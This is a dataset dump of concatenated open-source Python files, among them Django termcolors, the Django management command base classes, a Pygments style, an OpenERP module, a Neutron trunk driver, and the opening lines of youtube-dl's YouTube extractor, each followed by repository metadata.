super().contribute_to_class(cls, name, **kwargs)
# Attach update_dimension_fields so that dimension fields declared
# after their corresponding image field don't stay cleared by
# Model.__init__, see bug #11196.
# Only run post-initialization dimension update on non-abstract models
if not cls._meta.abstract:
signals.post_init.connect(self.update_dimension_fields, sender=cls)
def update_dimension_fields(self, instance, force=False, *args, **kwargs):
"""
Update field's width and height fields, if defined.
This method is hooked up to model's post_init signal to update
dimensions after instantiating a model instance. However, dimensions
won't be updated if the dimensions fields are already populated. This
avoids unnecessary recalculation when loading an object from the
database.
Dimensions can be forced to update with force=True, which is how
ImageFileDescriptor.__set__ calls this method.
"""
# Nothing to update if the field doesn't have dimension fields or if
# the field is deferred.
has_dimension_fields = self.width_field or self.height_field
if not has_dimension_fields or self.attname not in instance.__dict__:
return
# getattr will call the ImageFileDescriptor's __get__ method, which
# coerces the assigned value into an instance of self.attr_class
# (ImageFieldFile in this case).
file = getattr(instance, self.attname)
# Nothing to update if we have no file and not being forced to update.
if not file and not force:
return
dimension_fields_filled = not(
(self.width_field and not getattr(instance, self.width_field)) or
(self.height_field and not getattr(instance, self.height_field))
)
# When both dimension fields have values, we are most likely loading
# data from the database or updating an image field that already had
# an image stored. In the first case, we don't want to update the
# dimension fields because we are already getting their values from the
# database. In the second case, we do want to update the dimensions
# fields and will skip this return because force will be True since we
# were called from ImageFileDescriptor.__set__.
if dimension_fields_filled and not force:
return
# file should be an instance of ImageFieldFile or should be None.
if file:
width = file.width
height = file.height
else:
# No file, so clear dimensions fields.
width = None
height = None
# Update the width and height fields.
if self.width_field:
setattr(instance, self.width_field, width)
if self.height_field:
setattr(instance, self.height_field, height)
def formfield(self, **kwargs):
defaults = {'form_class': forms.ImageField}
defaults.update(kwargs)
return super().formfield(**defaults)
| bsd-3-clause | -2,786,124,613,586,705,000 | 37.769892 | 100 | 0.619037 | false |
Medigate/cutiuta-server | cutiuta-server/env/lib/python3.4/site-packages/django/utils/termcolors.py | 87 | 7302 | """
termcolors.py
"""
from django.utils import six
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = {color_names[x]: '3%s' % x for x in range(8)}
background = {color_names[x]: '4%s' % x for x in range(8)}
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print(colorize('first line', fg='red', opts=('noreset',)))
print('this should be red too')
print(colorize('and so should this'))
print('this should not be red')
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in six.iteritems(kwargs):
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = '%s\x1b[%sm' % (text or '', RESET)
return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print(bold_red('hello'))
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'SUCCESS': {},
'WARNING': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
'MIGRATE_HEADING': {},
'MIGRATE_LABEL': {},
},
DARK_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'yellow'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green'},
'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'yellow'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
},
LIGHT_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'blue'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
'HTTP_NOT_MODIFIED': {'fg': 'green'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'red'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
The general form of a palette definition is:
"palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
where:
palette is a named palette; one of 'light', 'dark', or 'nocolor'.
role is a named style used by Django
        fg is a foreground color.
        bg is a background color.
        option is a display option.
Specifying a named palette is the same as manually specifying the individual
definitions for each role. Any individual definitions following the palette
definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
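
    For example (an illustrative value, not an exhaustive specification), the
    setting::

        DJANGO_COLORS="light;error=yellow/blue,blink;notice=magenta"

    starts from the 'light' palette and then overrides the 'error' and
    'notice' roles.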
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# The first instruction can contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
| gpl-3.0 | 8,024,579,316,895,611,000 | 33.121495 | 89 | 0.529581 | false |
javierTerry/odoo | addons/web/doc/_themes/flask_theme_support.py | 2228 | 4875 | # flasky extensions. flasky pygments style based on tango style
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
class FlaskyStyle(Style):
background_color = "#f8f8f8"
default_style = ""
styles = {
# No corresponding class for the following:
#Text: "", # class: ''
Whitespace: "underline #f8f8f8", # class: 'w'
Error: "#a40000 border:#ef2929", # class: 'err'
Other: "#000000", # class 'x'
Comment: "italic #8f5902", # class: 'c'
Comment.Preproc: "noitalic", # class: 'cp'
Keyword: "bold #004461", # class: 'k'
Keyword.Constant: "bold #004461", # class: 'kc'
Keyword.Declaration: "bold #004461", # class: 'kd'
Keyword.Namespace: "bold #004461", # class: 'kn'
Keyword.Pseudo: "bold #004461", # class: 'kp'
Keyword.Reserved: "bold #004461", # class: 'kr'
Keyword.Type: "bold #004461", # class: 'kt'
Operator: "#582800", # class: 'o'
Operator.Word: "bold #004461", # class: 'ow' - like keywords
Punctuation: "bold #000000", # class: 'p'
# because special names such as Name.Class, Name.Function, etc.
# are not recognized as such later in the parsing, we choose them
# to look the same as ordinary variables.
Name: "#000000", # class: 'n'
Name.Attribute: "#c4a000", # class: 'na' - to be revised
Name.Builtin: "#004461", # class: 'nb'
Name.Builtin.Pseudo: "#3465a4", # class: 'bp'
Name.Class: "#000000", # class: 'nc' - to be revised
Name.Constant: "#000000", # class: 'no' - to be revised
Name.Decorator: "#888", # class: 'nd' - to be revised
Name.Entity: "#ce5c00", # class: 'ni'
Name.Exception: "bold #cc0000", # class: 'ne'
Name.Function: "#000000", # class: 'nf'
Name.Property: "#000000", # class: 'py'
Name.Label: "#f57900", # class: 'nl'
Name.Namespace: "#000000", # class: 'nn' - to be revised
Name.Other: "#000000", # class: 'nx'
Name.Tag: "bold #004461", # class: 'nt' - like a keyword
Name.Variable: "#000000", # class: 'nv' - to be revised
Name.Variable.Class: "#000000", # class: 'vc' - to be revised
Name.Variable.Global: "#000000", # class: 'vg' - to be revised
Name.Variable.Instance: "#000000", # class: 'vi' - to be revised
Number: "#990000", # class: 'm'
Literal: "#000000", # class: 'l'
Literal.Date: "#000000", # class: 'ld'
String: "#4e9a06", # class: 's'
String.Backtick: "#4e9a06", # class: 'sb'
String.Char: "#4e9a06", # class: 'sc'
String.Doc: "italic #8f5902", # class: 'sd' - like a comment
String.Double: "#4e9a06", # class: 's2'
String.Escape: "#4e9a06", # class: 'se'
String.Heredoc: "#4e9a06", # class: 'sh'
String.Interpol: "#4e9a06", # class: 'si'
String.Other: "#4e9a06", # class: 'sx'
String.Regex: "#4e9a06", # class: 'sr'
String.Single: "#4e9a06", # class: 's1'
String.Symbol: "#4e9a06", # class: 'ss'
Generic: "#000000", # class: 'g'
Generic.Deleted: "#a40000", # class: 'gd'
Generic.Emph: "italic #000000", # class: 'ge'
Generic.Error: "#ef2929", # class: 'gr'
Generic.Heading: "bold #000080", # class: 'gh'
Generic.Inserted: "#00A000", # class: 'gi'
Generic.Output: "#888", # class: 'go'
Generic.Prompt: "#745334", # class: 'gp'
Generic.Strong: "bold #000000", # class: 'gs'
Generic.Subheading: "bold #800080", # class: 'gu'
Generic.Traceback: "bold #a40000", # class: 'gt'
}
| agpl-3.0 | -7,218,263,949,294,705,000 | 55.686047 | 83 | 0.435897 | false |
wfxiang08/django178 | django/contrib/formtools/tests/wizard/namedwizardtests/forms.py | 95 | 1760 | import os
import tempfile
from django import forms
from django.core.files.storage import FileSystemStorage
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.template import Template, Context
from django.contrib.auth.models import User
from django.contrib.formtools.wizard.views import NamedUrlWizardView
temp_storage_location = tempfile.mkdtemp(dir=os.environ.get('DJANGO_TEST_TEMP_DIR'))
temp_storage = FileSystemStorage(location=temp_storage_location)
class Page1(forms.Form):
name = forms.CharField(max_length=100)
user = forms.ModelChoiceField(queryset=User.objects.all())
thirsty = forms.NullBooleanField()
class Page2(forms.Form):
address1 = forms.CharField(max_length=100)
address2 = forms.CharField(max_length=100)
file1 = forms.FileField()
class Page3(forms.Form):
random_crap = forms.CharField(max_length=100)
Page4 = formset_factory(Page3, extra=2)
class ContactWizard(NamedUrlWizardView):
file_storage = temp_storage
def done(self, form_list, **kwargs):
c = Context({
'form_list': [x.cleaned_data for x in form_list],
'form_dict': kwargs.get('form_dict'),
'all_cleaned_data': self.get_all_cleaned_data()
})
for form in self.form_list.keys():
c[form] = self.get_cleaned_data_for_step(form)
c['this_will_fail'] = self.get_cleaned_data_for_step('this_will_fail')
return HttpResponse(Template('').render(c))
class SessionContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.session.SessionStorage'
class CookieContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.cookie.CookieStorage'
| bsd-3-clause | -1,027,926,735,189,552,300 | 29.344828 | 84 | 0.723864 | false |
jjscarafia/server-tools | base_optional_quick_create/model.py | 41 | 2507 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013 Agile Business Group sagl (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
class ir_model(orm.Model):
_inherit = 'ir.model'
_columns = {
'avoid_quick_create': fields.boolean('Avoid quick create'),
}
def _wrap_name_create(self, old_create, model):
def wrapper(cr, uid, name, context=None):
raise orm.except_orm(
_('Error'),
_("Can't create quickly. Opening create form"))
return wrapper
def _register_hook(self, cr, ids=None):
if ids is None:
ids = self.search(cr, SUPERUSER_ID, [])
for model in self.browse(cr, SUPERUSER_ID, ids):
if model.avoid_quick_create:
model_name = model.model
model_obj = self.pool.get(model_name)
if model_obj and not hasattr(model_obj, 'check_quick_create'):
model_obj.name_create = self._wrap_name_create(
model_obj.name_create, model_name)
model_obj.check_quick_create = True
return True
def create(self, cr, uid, vals, context=None):
res_id = super(ir_model, self).create(cr, uid, vals, context=context)
self._register_hook(cr, [res_id])
return res_id
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
res = super(ir_model, self).write(cr, uid, ids, vals, context=context)
self._register_hook(cr, ids)
return res
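# A minimal sketch of the intended behaviour (the target model is
# hypothetical): once ``avoid_quick_create`` is set on an ir.model record,
# ``name_create`` on that model raises, so clients fall back to the full
# creation form.
#
#     ir_model_obj = self.pool.get('ir.model')
#     model_ids = ir_model_obj.search(cr, uid, [('model', '=', 'res.partner')])
#     ir_model_obj.write(cr, uid, model_ids, {'avoid_quick_create': True})
#     # self.pool.get('res.partner').name_create(cr, uid, 'New partner')
#     # now raises orm.except_orm(_('Error'),
#     #                           _("Can't create quickly. Opening create form"))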
| agpl-3.0 | -2,564,209,502,535,694,300 | 38.793651 | 78 | 0.579976 | false |
cloudbase/neutron | neutron/services/trunk/drivers/linuxbridge/driver.py | 4 | 1688 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron_lib import constants
from neutron.extensions import portbindings
from neutron.services.trunk import constants as trunk_consts
from neutron.services.trunk.drivers import base
LOG = logging.getLogger(__name__)
NAME = 'linuxbridge'
SUPPORTED_INTERFACES = (
portbindings.VIF_TYPE_BRIDGE,
)
SUPPORTED_SEGMENTATION_TYPES = (
trunk_consts.VLAN,
)
class LinuxBridgeDriver(base.DriverBase):
"""Server-side Trunk driver for the ML2 Linux Bridge driver."""
@property
def is_loaded(self):
try:
return NAME in cfg.CONF.ml2.mechanism_drivers
except cfg.NoSuchOptError:
return False
@classmethod
def create(cls):
return cls(NAME, SUPPORTED_INTERFACES, SUPPORTED_SEGMENTATION_TYPES,
constants.AGENT_TYPE_LINUXBRIDGE, can_trunk_bound_port=True)
def register():
# NOTE(kevinbenton): the thing that is keeping this from being
# immediately garbage collected is that it registers callbacks
LinuxBridgeDriver.create()
LOG.debug("Linux bridge trunk driver initialized.")
| apache-2.0 | -9,081,539,082,100,173,000 | 30.849057 | 79 | 0.73519 | false |
caot/intellij-community | python/lib/Lib/site-packages/django/core/management/base.py | 248 | 16452 | """
Base classes for writing management commands (named commands which can
be executed through ``django-admin.py`` or ``manage.py``).
"""
import os
import sys
from optparse import make_option, OptionParser
import django
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import color_style
from django.utils.encoding import smart_str
class CommandError(Exception):
"""
Exception class indicating a problem while executing a management
command.
If this exception is raised during the execution of a management
command, it will be caught and turned into a nicely-printed error
message to the appropriate output stream (i.e., stderr); as a
result, raising this exception (with a sensible description of the
error) is the preferred way to indicate that something has gone
wrong in the execution of a command.
"""
pass
def handle_default_options(options):
"""
Include any default options that all commands should accept here
so that ManagementUtility can handle them before searching for
user commands.
"""
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
if options.pythonpath:
sys.path.insert(0, options.pythonpath)
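# For example (project name and path are illustrative), running
# ``manage.py runserver --settings=mysite.settings --pythonpath=/srv/code``
# passes through here: DJANGO_SETTINGS_MODULE is set to 'mysite.settings' and
# '/srv/code' is prepended to sys.path before the subcommand itself runs.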
class BaseCommand(object):
"""
The base class from which all management commands ultimately
derive.
Use this class if you want access to all of the mechanisms which
parse the command-line arguments and work out what code to call in
response; if you don't need to change any of that behavior,
consider using one of the subclasses defined in this file.
If you are interested in overriding/customizing various aspects of
the command-parsing and -execution behavior, the normal flow works
as follows:
1. ``django-admin.py`` or ``manage.py`` loads the command class
and calls its ``run_from_argv()`` method.
2. The ``run_from_argv()`` method calls ``create_parser()`` to get
an ``OptionParser`` for the arguments, parses them, performs
any environment changes requested by options like
``pythonpath``, and then calls the ``execute()`` method,
passing the parsed arguments.
3. The ``execute()`` method attempts to carry out the command by
calling the ``handle()`` method with the parsed arguments; any
output produced by ``handle()`` will be printed to standard
output and, if the command is intended to produce a block of
SQL statements, will be wrapped in ``BEGIN`` and ``COMMIT``.
4. If ``handle()`` raised a ``CommandError``, ``execute()`` will
instead print an error message to ``stderr``.
Thus, the ``handle()`` method is typically the starting point for
subclasses; many built-in commands and command types either place
all of their logic in ``handle()``, or perform some additional
parsing work in ``handle()`` and then delegate from it to more
specialized methods as needed.
Several attributes affect behavior at various steps along the way:
``args``
A string listing the arguments accepted by the command,
suitable for use in help messages; e.g., a command which takes
a list of application names might set this to '<appname
appname ...>'.
``can_import_settings``
A boolean indicating whether the command needs to be able to
import Django settings; if ``True``, ``execute()`` will verify
that this is possible before proceeding. Default value is
``True``.
``help``
A short description of the command, which will be printed in
help messages.
``option_list``
This is the list of ``optparse`` options which will be fed
into the command's ``OptionParser`` for parsing arguments.
``output_transaction``
A boolean indicating whether the command outputs SQL
statements; if ``True``, the output will automatically be
wrapped with ``BEGIN;`` and ``COMMIT;``. Default value is
``False``.
``requires_model_validation``
A boolean; if ``True``, validation of installed models will be
performed prior to executing the command. Default value is
``True``. To validate an individual application's models
rather than all applications' models, call
``self.validate(app)`` from ``handle()``, where ``app`` is the
application's Python module.
"""
# Metadata about this command.
option_list = (
make_option('-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output'),
make_option('--settings',
help='The Python path to a settings module, e.g. "myproject.settings.main". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.'),
make_option('--pythonpath',
help='A directory to add to the Python path, e.g. "/home/djangoprojects/myproject".'),
make_option('--traceback', action='store_true',
help='Print traceback on exception'),
)
help = ''
args = ''
# Configuration shortcuts that alter various logic.
can_import_settings = True
requires_model_validation = True
output_transaction = False # Whether to wrap the output in a "BEGIN; COMMIT;"
def __init__(self):
self.style = color_style()
def get_version(self):
"""
Return the Django version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return django.get_version()
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
usage = '%%prog %s [options] %s' % (subcommand, self.args)
if self.help:
return '%s\n\n%s' % (usage, self.help)
else:
return usage
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
return OptionParser(prog=prog_name,
usage=self.usage(subcommand),
version=self.get_version(),
option_list=self.option_list)
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command.
"""
parser = self.create_parser(argv[0], argv[1])
options, args = parser.parse_args(argv[2:])
handle_default_options(options)
self.execute(*args, **options.__dict__)
def execute(self, *args, **options):
"""
Try to execute this command, performing model validation if
needed (as controlled by the attribute
``self.requires_model_validation``). If the command raises a
``CommandError``, intercept it and print it sensibly to
stderr.
"""
# Switch to English, because django-admin.py creates database content
# like permissions, and those shouldn't contain any translations.
# But only do this if we can assume we have a working settings file,
# because django.utils.translation requires settings.
if self.can_import_settings:
try:
from django.utils import translation
translation.activate('en-us')
except ImportError, e:
# If settings should be available, but aren't,
# raise the error and quit.
sys.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
try:
self.stdout = options.get('stdout', sys.stdout)
self.stderr = options.get('stderr', sys.stderr)
if self.requires_model_validation:
self.validate()
output = self.handle(*args, **options)
if output:
if self.output_transaction:
# This needs to be imported here, because it relies on
# settings.
from django.db import connections, DEFAULT_DB_ALIAS
connection = connections[options.get('database', DEFAULT_DB_ALIAS)]
if connection.ops.start_transaction_sql():
self.stdout.write(self.style.SQL_KEYWORD(connection.ops.start_transaction_sql()) + '\n')
self.stdout.write(output)
if self.output_transaction:
self.stdout.write('\n' + self.style.SQL_KEYWORD("COMMIT;") + '\n')
except CommandError, e:
self.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
def validate(self, app=None, display_num_errors=False):
"""
Validates the given app, raising CommandError for any errors.
If app is None, then this will validate all installed apps.
"""
from django.core.management.validation import get_validation_errors
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
s = StringIO()
num_errors = get_validation_errors(s, app)
if num_errors:
s.seek(0)
error_text = s.read()
raise CommandError("One or more models did not validate:\n%s" % error_text)
if display_num_errors:
self.stdout.write("%s error%s found\n" % (num_errors, num_errors != 1 and 's' or ''))
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement
this method.
"""
raise NotImplementedError()
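# A minimal sketch of a concrete subclass (command name, option and greeting
# are hypothetical); a real command would be named ``Command`` and live in
# ``yourapp/management/commands/greet.py``, invoked as
# ``manage.py greet --name=Django``.
class _ExampleGreetCommand(BaseCommand):
    help = 'Prints a friendly greeting.'
    option_list = BaseCommand.option_list + (
        make_option('--name', default='world', help='Who to greet.'),
    )
    def handle(self, *args, **options):
        self.stdout.write('Hello, %s!\n' % options['name'])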
class AppCommand(BaseCommand):
"""
A management command which takes one or more installed application
names as arguments, and does something with each of them.
Rather than implementing ``handle()``, subclasses must implement
``handle_app()``, which will be called once for each application.
"""
args = '<appname appname ...>'
def handle(self, *app_labels, **options):
from django.db import models
if not app_labels:
raise CommandError('Enter at least one appname.')
try:
app_list = [models.get_app(app_label) for app_label in app_labels]
except (ImproperlyConfigured, ImportError), e:
raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e)
output = []
for app in app_list:
app_output = self.handle_app(app, **options)
if app_output:
output.append(app_output)
return '\n'.join(output)
def handle_app(self, app, **options):
"""
Perform the command's actions for ``app``, which will be the
Python module corresponding to an application name given on
the command line.
"""
raise NotImplementedError()
class LabelCommand(BaseCommand):
"""
A management command which takes one or more arbitrary arguments
(labels) on the command line, and does something with each of
them.
Rather than implementing ``handle()``, subclasses must implement
``handle_label()``, which will be called once for each label.
If the arguments should be names of installed applications, use
``AppCommand`` instead.
"""
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
if not labels:
raise CommandError('Enter at least one %s.' % self.label)
output = []
for label in labels:
label_output = self.handle_label(label, **options)
if label_output:
output.append(label_output)
return '\n'.join(output)
def handle_label(self, label, **options):
"""
Perform the command's actions for ``label``, which will be the
string as given on the command line.
"""
raise NotImplementedError()
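# A minimal sketch of a LabelCommand subclass (the command and what it does
# are hypothetical); it would be invoked as e.g.
# ``manage.py touch_keys sessions avatars``.
class _ExampleTouchKeysCommand(LabelCommand):
    help = 'Marks the given cache keys as touched.'
    label = 'cache key'
    def handle_label(self, label, **options):
        return 'touched %s' % label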
class NoArgsCommand(BaseCommand):
"""
A command which takes no arguments on the command line.
Rather than implementing ``handle()``, subclasses must implement
``handle_noargs()``; ``handle()`` itself is overridden to ensure
no arguments are passed to the command.
Attempting to pass arguments will raise ``CommandError``.
"""
args = ''
def handle(self, *args, **options):
if args:
raise CommandError("Command doesn't accept any arguments")
return self.handle_noargs(**options)
def handle_noargs(self, **options):
"""
Perform this command's actions.
"""
raise NotImplementedError()
def copy_helper(style, app_or_project, name, directory, other_name=''):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
"""
# style -- A color style object (see django.core.management.color).
# app_or_project -- The string 'app' or 'project'.
# name -- The name of the application or project.
# directory -- The directory to which the layout template should be copied.
# other_name -- When copying an application layout, this should be the name
# of the project.
import re
import shutil
other = {'project': 'app', 'app': 'project'}[app_or_project]
if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name.
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message))
top_dir = os.path.join(directory, name)
try:
os.mkdir(top_dir)
except OSError, e:
raise CommandError(e)
# Determine where the app or project templates are. Use
# django.__path__[0] because we don't know into which directory
# django has been installed.
template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project)
for d, subdirs, files in os.walk(template_dir):
relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name)
if relative_dir:
os.mkdir(os.path.join(top_dir, relative_dir))
for subdir in subdirs[:]:
if subdir.startswith('.'):
subdirs.remove(subdir)
for f in files:
if not f.endswith('.py'):
# Ignore .pyc, .pyo, .py.class etc, as they cause various
# breakages.
continue
path_old = os.path.join(d, f)
path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name))
fp_old = open(path_old, 'r')
fp_new = open(path_new, 'w')
fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name))
fp_old.close()
fp_new.close()
try:
shutil.copymode(path_old, path_new)
_make_writeable(path_new)
except OSError:
sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're probably using an uncommon filesystem setup. No problem.\n" % path_new))
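# A minimal usage sketch (app name and target directory are illustrative);
# this mirrors what the startapp/startproject commands effectively do. The
# helper below is never called and only documents the call shape.
def _example_copy_layout():
    copy_helper(color_style(), 'app', 'polls', '/srv/code/mysite', 'mysite')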
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
| apache-2.0 | 5,640,662,413,334,929,000 | 37.171694 | 177 | 0.617372 | false |
jonyroda97/redbot-amigosprovaveis | lib/youtube_dl/extractor/youtube.py | 1 | 131830 | # coding: utf-8
from __future__ import unicode_literals
import itertools
import json
import os.path
import random
import re
import time
import traceback
from .common import InfoExtractor, SearchInfoExtractor
from ..jsinterp import JSInterpreter
from ..swfinterp import SWFInterpreter
from ..compat import (
compat_chr,
compat_kwargs,
compat_parse_qs,
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
clean_html,
error_to_compat_str,
ExtractorError,
float_or_none,
get_element_by_attribute,
get_element_by_id,
int_or_none,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
qualities,
remove_quotes,
remove_start,
smuggle_url,
str_to_int,
try_get,
unescapeHTML,
unified_strdate,
unsmuggle_url,
uppercase_escape,
urlencode_postdata,
)
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_LOGIN_URL = 'https://accounts.google.com/ServiceLogin'
_TWOFACTOR_URL = 'https://accounts.google.com/signin/challenge'
_LOOKUP_URL = 'https://accounts.google.com/_/signin/sl/lookup'
